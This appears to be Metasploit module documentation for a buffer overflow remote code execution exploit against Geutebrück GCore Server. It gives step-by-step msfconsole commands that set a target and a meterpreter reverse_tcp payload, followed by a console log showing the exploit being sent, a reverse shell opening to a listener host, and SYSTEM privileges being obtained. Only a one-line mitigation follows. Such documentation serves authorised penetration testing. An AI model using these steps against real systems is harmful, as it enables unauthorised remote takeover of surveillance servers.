## Vulnerable Application

  Geutebrück GCore Server 1.3.8.42, 1.4.2.37 are vulnerable to a buffer overflow exploitation.
  Since this application is started with system privileges this allows a system remote code execution.

## Verification Steps

  1. Install Windows as basic OS (Tested with Win2012R2, Windows 7)
  2. Install the Geutebrück GCore server
  3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml available is.
  4. Start msfconsole
  5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
  6. Do: ```set rhost <your target ip>```
  7. Do: ```set rport 13003```
  8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
  9. Do: ```exploit```
  10. You should get a shell as NT/SYSTEM.

## Scenarios

### Geutebrueck GCore 1.4.2.37

```
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options

Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.10      yes       The target address
   RPORT    13003             yes       The target port



   Payload options (windows/x64/meterpreter/reverse_tcp):

      Name      Current Setting  Required  Description
      ----      ---------------  --------  -----------
      EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
      LHOST     192.168.1.11     yes       The listen address
      LPORT     4444             yes       The listen port


   Exploit target:

      Id  Name
      --  ----
      0   Automatic Targeting

msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
    [*] Started reverse TCP handler on 192.168.1.11:4444
    [*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
    [*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
    [*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
    [*] 192.168.1.10:13003 - Crafting Exploit...
    [*] 192.168.1.10:13003 - Exploit ready for sending...
    [*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to
    [*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
    [*] 192.168.1.10:13003 - Closing socket.
    meterpreter > getsystem
    ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
    meterpreter > getuid Server username:
    NT-AUTORITÄT\SYSTEM
    meterpreter >
```

## Mitigation

Geutebrück released a new version and an update for the affected product which should be installed to fix the described vulnerabilities.
